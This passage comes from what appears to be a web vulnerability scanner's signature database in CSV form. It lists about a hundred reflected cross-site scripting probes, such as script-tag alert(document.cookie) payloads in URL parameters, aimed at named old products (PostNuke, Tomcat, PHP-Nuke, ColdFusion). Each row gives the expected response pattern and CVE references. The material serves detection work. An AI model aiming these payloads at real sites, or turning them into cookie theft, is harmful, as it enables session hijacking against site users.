attacks.\",\"\",\"\"\n\"000715\",\"\",\"4\",\"/clusterframe.jsp?cluster=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.\",\"\",\"\"\n\"000716\",\"\",\"4\",\"/article.cfm?id=1'<script>alert(document.cookie);</script>\",\"GET\",\"BODY:\\[SQL SERVER\\] Error Code\",\"ColdFusion may reveal SQL information in malformed requests.\",\"\",\"\"\n\"000717\",\"\",\"4\",\"/upload.php?type=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000718\",\"CVE-2002-1954\",\"4\",\"/soinfo.php?\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The PHP script soinfo.php is vulnerable to Cross Site Scripting. Set expose_php = Off in php.ini.\",\"\",\"\"\n\"000719\",\"\",\"4\",\"/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Postnuke is vulnerable to Cross Site Scripting.\",\"\",\"\"\n\"000720\",\"\",\"4\",\"/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Postnuke is vulnerable to Cross Site Scripting.\",\"\",\"\"\n\"000721\",\"\",\"4\",\"/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script\\+>\",\"Postnuke is vulnerable to Cross Site Scripting.\",\"\",\"\"\n\"000722\",\"\",\"4\",\"/webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\);<\\/script>\",\"Documentum Webtop (Tomcat 4.1) is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000723\",\"\",\"4\",\"/addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"phpLinkat is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000724\",\"\",\"4\",\"/666%0a%0a<script>alert('Vulnerable');</script>666.jsp\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\);<\\/script>\",\"Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000725\",\"\",\"4\",\"/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000726\",\"\",\"4\",\"/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes.\",\"\",\"\"\n\"000727\",\"\",\"4\",\"/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes.\",\"\",\"\"\n\"000728\",\"\",\"4\",\"/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes.\",\"\",\"\"\n\"000729\",\"\",\"4\",\"/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes.\",\"\",\"\"\n\"000730\",\"\",\"4\",\"/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message.\",\"\",\"\"\n\"000731\",\"\",\"4\",\"/<script>alert('Vulnerable')</script>.shtm\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\\.shtml\",\"Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000732\",\"\",\"4\",\"/<script>alert('Vulnerable')</script>.stm\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\\.shtml\",\"Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000733\",\"\",\"4\",\"/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\\\"><script>alert\\(document\\.cookie\\)<\\/script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages.\",\"\",\"\"\n\"000734\",\"\",\"4\",\"/SiteServer/Knowledge/Default.asp?ctr=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Site Server is vulnerable to Cross Site Scripting\",\"\",\"\"\n\"000735\",\"\",\"4\",\"/_mem_bin/formslogin.asp?\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Site Server is vulnerable to Cross Site Scripting\",\"\",\"\"\n\"000736\",\"https://seclists.org/fulldisclosure/2003/Jun/494\",\"4\",\"/nosuchurl/><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages.\",\"\",\"\"\n\"000737\",\"CVE-2002-1455\",\"4\",\"/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x\",\"GET\",\"BODY:<SCRIPT>alert\\('Vulnerable'\\)<\\/SCRIPT>\",\"OmniHTTPD's test.php is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000738\",\"CVE-2002-1455\",\"4\",\"/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x\",\"GET\",\"BODY:<SCRIPT>alert\\('Vulnerable'\\)<\\/SCRIPT>\",\"OmniHTTPD's test.shtml is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000739\",\"CVE-2002-1455\",\"4\",\"@CGIDIRSredir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"OmniHTTPD's redir.exe is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000740\",\"\",\"4\",\"/search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Default Sambar file is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000741\",\"\",\"4\",\"/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000742\",\"CVE-2002-0955\",\"4\",\"@CGIDIRSYaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000743\",\"\",\"4\",\"@CGIDIRSvq/demos/respond.pl?<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files.\",\"\",\"\"\n\"000744\",\"CVE-2002-0771\",\"4\",\"@CGIDIRSviewcvs.cgi/viewcvs/viewcvs/?sortby=rev\\\"><script>alert('Vulnerable')</script>;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000745\",\"CVE-2002-0771\",\"4\",\"@CGIDIRSviewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000746\",\"CVE-2002-1008\",\"4\",\"@CGIDIRSurlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"urlcount.cgi on the Lil'HTTP server may be vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000747\",\"\",\"4\",\"@CGIDIRStest-cgi.exe?<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Default CGI is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000748\",\"\",\"4\",\"@CGIDIRSstart.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000749\",\"CVE-2002-1036\",\"4\",\"@CGIDIRSsearch.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fluid Dynamics FD Search engine is vulnerable to Cross Site Scripting (XSS). Upgrade to FDSE version 2.0.0.0055\",\"\",\"\"\n\"000750\",\"CVE-2003-0614\",\"4\",\"@CGIDIRSsearch.php?searchstring=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000751\",\"CVE-2002-1009\",\"4\",\"@CGIDIRSpbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Lil'HTTP Server (Summit Computer Networks) CGI is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000752\",\"\",\"4\",\"@CGIDIRSmyguestbook.cgi?action=view\",\"GET\",\"CODE:200\",\"myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version.\",\"\",\"\"\n\"000753\",\"CVE-2002-1007\",\"4\",\"@CGIDIRSlogin.pl?course_id=\\\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000754\",\"\",\"4\",\"@CGIDIRShtsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"htdig is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000755\",\"\",\"4\",\"@CGIDIRSFormMail.cgi?<script>alert(\\\"Vulnerable\\\");</script>\",\"GET\",\"BODY:<script>alert\\(\\\"Vulnerable\\\"\\);<\\/script>\",\"FormMail.cgi allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000756\",\"CVE-2002-0230 https://sourceforge.net/projects/faqomatic/\",\"4\",\"@CGIDIRSfom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) Check for updates.\",\"\",\"\"\n\"000757\",\"CVE-2002-2011 https://sourceforge.net/projects/faqomatic/\",\"4\",\"@CGIDIRSfom.cgi?file=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000758\",\"\",\"4\",\"@CGIDIRSerba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000759\",\"CVE-2002-1680\",\"4\",\"@CGIDIRSdiagnose.cgi\",\"GET\",\"CODE:200\",\"This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000760\",\"\",\"4\",\"@CGIDIRSdansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\);<\\/script>\",\"CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages.\",\"\",\"\"\n\"000761\",\"\",\"4\",\"@CGIDIRScgicso?query=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This CGI is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000762\",\"CVE-2002-1006\",\"4\",\"@CGIDIRSbetsie/parserl.pl/<script>alert('Vulnerable')</script>;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"BBC Education Text to Speech Internet Enhancer allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000763\",\"CVE-2002-1703 http://www.mewsoft.com/\",\"4\",\"@CGIDIRSauction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Mewsoft Auction 3.0 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000764\",\"CVE-2002-2348\",\"4\",\"@CGIDIRSathcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Authoria HR Suite is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000765\",\"CVE-2002-0346\",\"4\",\"@CGIDIRS.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000766\",\"CVE-2002-0346\",\"4\",\"@CGIDIRS.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>\",\"GET\",\"BODY:img src=javascript:alert\\('Vulnerable'\\)\",\"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000767\",\"CA-2000-02\",\"4\",\"/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Cross site scripting (XSS) is allowed with .aspx file requests.\",\"\",\"\"\n\"000768\",\"CA-2000-02\",\"4\",\"/~/<script>alert('Vulnerable')</script>.aspx\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Cross site scripting (XSS) is allowed with .aspx file requests.\",\"\",\"\"\n\"000769\",\"CA-2000-02\",\"4\",\"/~/<script>alert('Vulnerable')</script>.asp\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Cross site scripting (XSS) is allowed with .asp file requests.\",\"\",\"\"\n\"000770\",\"CVE-2002-2350\",\"4\",\"/z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Zorum 2.4 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000771\",\"\",\"4\",\"/catinfo?<b>\\\">TESTING\",\"GET\",\"BODY:<b>\\\">TESTING\",\"The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000772\",\"\",\"4\",\"/webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script>\",\"GET\",\"BODY:alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000773\",\"CVE-2004-0584\",\"4\",\"/webamil/test.php\",\"GET\",\"BODY:IMP: 3\\.\\(0\\|1\\|2\\|2\\.1\\)\",\"IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000774\",\"\",\"4\",\"/users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"GeekLog 1.3.7 allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000775\",\"\",\"4\",\"/usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000776\",\"\",\"4\",\"/user.php?op=userinfo&uname=<script>alert('hi');</script>\",\"GET\",\"BODY:<script>alert\\('hi'\\);<\\/script>\",\"The PHP-Nuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1.\",\"\",\"\"\n\"000777\",\"\",\"4\",\"/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com\",\"GET\",\"BODY:javascript:alert\\(document\\.cookie\\)\",\"Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000778\",\"\",\"4\",\"/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)\",\"Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000779\",\"\",\"4\",\"/TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"PHP TopSites allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000780\",\"\",\"4\",\"/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>\",\"GET\",\"BODY:<script>javascript:alert\\(document\\.cookie\\)\",\"MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000781\",\"\",\"4\",\"/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)\",\"MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000782\",\"CVE-2002-0931\",\"4\",\"/supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"MyHelpdesk versions v20020509 and older are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000783\",\"CVE-2002-0931\",\"4\",\"/supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"MyHelpdesk versions v20020509 and older are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000784\",\"CVE-2002-0931\",\"4\",\"/supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"MyHelpdesk versions v20020509 and older are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000785\",\"\",\"4\",\"/sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page.\",\"\",\"\"\n\"000786\",\"CVE-2001-1524\",\"4\",\"/submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000787\",\"CVE-2002-1732\",\"4\",\"/ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000788\",\"CVE‑2002‑2321\",\"4\",\"/showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"phpLinkat is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000789\",\"\",\"4\",\"/shop/normal_html.cgi?file=&lt;script&gt;alert(\\\"Vulnerable\\\")&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"Happymail E-Commerce is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000790\",\"CVE-2002-0938\",\"4\",\"/setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000791\",\"\",\"4\",\"/servlet/custMsg?guestName=<script>alert(\\\"Vulnerable\\\")</script>\",\"POST\",\"BODY:<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000792\",\"\",\"4\",\"/servlet/CookieExample?cookiename=<script>alert(\\\"Vulnerable\\\")</script>\",\"POST\",\"BODY:<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000793\",\"\",\"4\",\"/servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page.\",\"\",\"\"\n\"000794\",\"\",\"4\",\"/search/index.cfm?<script>alert(\\\"Vulnerable\\\")</script>\",\"GET\",\"BODY:<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"Search agent allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000795\",\"\",\"4\",\"/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"ezPublish 2.27 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000796\",\"\",\"4\",\"/search.php?zoom_query=<script>alert(\\\"hello\\\")</script>\",\"GET\",\"BODY:<script>alert\\(\\\"hello\\\"\\)<\\/script>\",\"Wrensoft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000797\",\"CVE-2003-0614\",\"4\",\"/search.php?searchstring=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000798\",\"https://web.archive.org/web/20200228105003/https://www.securityfocus.com/archive/1/315554\",\"4\",\"/search.php?searchfor=\\\"><script>alert(1776)</script>\",\"GET\",\"BODY:<script>alert\\(1776\\)<\\/script>\",\"Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000799\",\"\",\"4\",\"/search.asp?term=<%00script>alert('Vulnerable')</script>\",\"GET\",\"BODY:alert\\('Vulnerable'\\)<\\/script>\",\"ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this).\",\"\",\"\"\n\"000800\",\"\",\"4\",\"/script>alert('Vulnerable')</script>.cfm\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). Patch or upgrade to a newer version, or change the default 404 document. http://www.macromedia.com/v1/handlers/index.cfm?ID=23047\",\"\",\"\"\n\"000801\",\"\",\"4\",\"/samples/search.dll?query=<script>alert(document.cookie)</script>&logic=AND\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000802\",\"\",\"4\",\"/replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000803\",\"https://www.exploit-db.com/exploits/22164\",\"4\",\"/profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"GeekLog 1.3.7 allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000804\",\"\",\"4\",\"/postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft+Utilities\\\"%3<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Postnuke Phoenix 0.7.2.3 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000805\",\"\",\"4\",\"/postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"PostNuke is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000806\",\"https://www.exploit-db.com/exploits/28589\",\"4\",\"/pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000807\",\"\",\"4\",\"/pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000808\",\"\",\"4\",\"/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000809\",\"\",\"4\",\"/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000810\",\"\",\"4\",\"/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\\\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000811\",\"\",\"4\",\"/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting 